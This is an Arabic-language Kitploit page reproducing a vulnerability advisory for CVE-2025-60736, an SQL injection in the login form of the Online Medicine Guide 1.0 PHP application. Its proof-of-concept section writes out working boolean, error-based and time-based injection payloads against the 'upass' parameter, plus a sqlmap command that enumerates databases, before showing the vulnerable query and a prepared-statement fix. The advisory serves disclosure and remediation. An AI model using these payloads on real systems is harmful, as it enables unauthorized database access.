Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-60736 — # code-projects Online Medicine Guide 1.0 عرضة لحقن SQL | Kitploit
أدوات/GitHubGitHub/nxvh1337/cve-2025-60736
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubnxvh1337/cve-2025-60736

CVE-2025-60736

# code-projects Online Medicine Guide 1.0 عرضة لحقن SQL

عرض المستودع
12منذ 11 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-60736: ثغرة حقن SQL في دليل الأدوية عبر الإنترنت

الملخص التنفيذي

توضح هذه الوثيقة ثغرة حرجة في حقن SQL تم اكتشافها في تطبيق ويب دليل الأدوية عبر الإنترنت. تسمح هذه الثغرة بالوصول غير المصرح به إلى قاعدة البيانات وتشكل مخاطر أمنية كبيرة على التطبيق ومستخدميه.

مقدم التقرير

  • نوح "nxvh" هيرود

1. معلومات المنتج

المنتج المتأثر

  • اسم المنتج: دليل الأدوية عبر الإنترنت
  • البائع: Code Projects
  • الصفحة الرئيسية للبائع: https://code-projects.org/online-medicine-guide-in-php-css-javascript-and-mysql-free-download/
  • الإصدار المتأثر: v1.0
  • الملف المعرض للخطر: /login.php
  • نوع البرنامج: تطبيق ويب (PHP/MySQL)

التفاصيل الفنية

  • لغة البرمجة: PHP
  • قاعدة البيانات: MySQL
  • الواجهة الأمامية: CSS, JavaScript
  • البنية المعمارية: حزمة LAMP/WAMP

2. تفاصيل الثغرة

تصنيف الثغرة

  • معرف CVE: CVE-2025-60736
  • نوع الثغرة: حقن SQL
  • الخطورة: حرجة
  • درجة CVSS: 9.8 (حرجة)
  • متجه الهجوم: الشبكة
  • تعقيد الهجوم: منخفض
  • الصلاحيات المطلوبة: لا شيء
  • تفاعل المستخدم: لا شيء
  • النطاق: متغير

تحليل السبب الجذري

تنبع الثغرة من عدم كفاية التحقق من صحة المدخلات وتنقيتها في ملف /login.php. يقوم التطبيق بدمج مدخلات المستخدم من معامل upass مباشرة في استعلامات SQL دون تنقية مناسبة أو استخدام عبارات مُعدة.

السبب الجذري الفني:

  • دمج سلاسل نصية مباشر في استعلامات SQL
  • عدم وجود تحقق من صحة المدخلات وتنقيتها
  • عدم تنفيذ عبارات مُعدة
  • عدم كفاية ربط المعاملات

3. إثبات المفهوم

موقع الثغرة

  • الملف: /login.php
  • المعامل: upass (POST)
  • متجه الهجوم: التلاعب بطلب HTTP POST

طرق الاستغلال

الطريقة 1: حقن SQL قائم على القيم المنطقية

root@kitploit:~
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

uname=uLnf&upass=rZgo' OR NOT 1852=1852-- iPRx

الطريقة 1: حقن SQL قائم على الأخطاء

root@kitploit:~
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

uname=uLnf&upass=rZgo' AND EXTRACTVALUE(4672,CONCAT(0x5c,0x7176707071,(SELECT (ELT(4672=4672,1))),0x71717a7071))-- knKp

الطريقة 2: حقن SQL أعمى قائم على الوقت

root@kitploit:~
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

uname=uLnf&upass=rZgo' AND (SELECT 2089 FROM (SELECT(SLEEP(5)))zUlY)-- mWfa

الاختبار الآلي

تم تأكيد الثغرة باستخدام sqlmap:

root@kitploit:~
sqlmap -u "http://localhost:8000/login.php" --data="uname=admin&upass=test" -p upass --batch --dbs

إثبات الاستغلال

4. خطة المعالجة

إجراءات فورية

  1. تصحيح طارئ: تنفيذ التحقق من صحة المدخلات لمعامل upass
  2. مراقبة قاعدة البيانات: تفعيل تسجيل شامل للأنشطة المشبوهة
  3. تقييد الوصول: تنفيذ تحديد معدل الطلبات وقيود قائمة على عنوان IP
  4. تدقيق أمني: إجراء تقييم أمني فوري

5. المعالجة الفنية

مثال على إصلاح الكود

قبل (معرض للخطر):

root@kitploit:~
$query = "SELECT * FROM users WHERE username = '" . $_POST['uname'] . "'";

بعد (آمن):

root@kitploit:~
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ?");
$stmt->execute([$_POST['uname']]);

تنفيذ أفضل الممارسات الأمنية

  1. العبارات المُعدة: استخدام استعلامات ذات معاملات حصرية
  2. التحقق من صحة المدخلات: تنفيذ تحقق قائم على القوائم البيضاء
  3. ترميز المخرجات: ترميز جميع بيانات المخرجات بشكل صحيح
  4. معالجة الأخطاء: تنفيذ معالجة آمنة للأخطاء دون كشف المعلومات
  5. ضوابط الوصول: تنفيذ مصادقة وتفويض مناسبين

إصدار الوثيقة: 1.0
آخر تحديث: 03/10/2025 (يوم/شهر/سنة)

تنزيل الأداة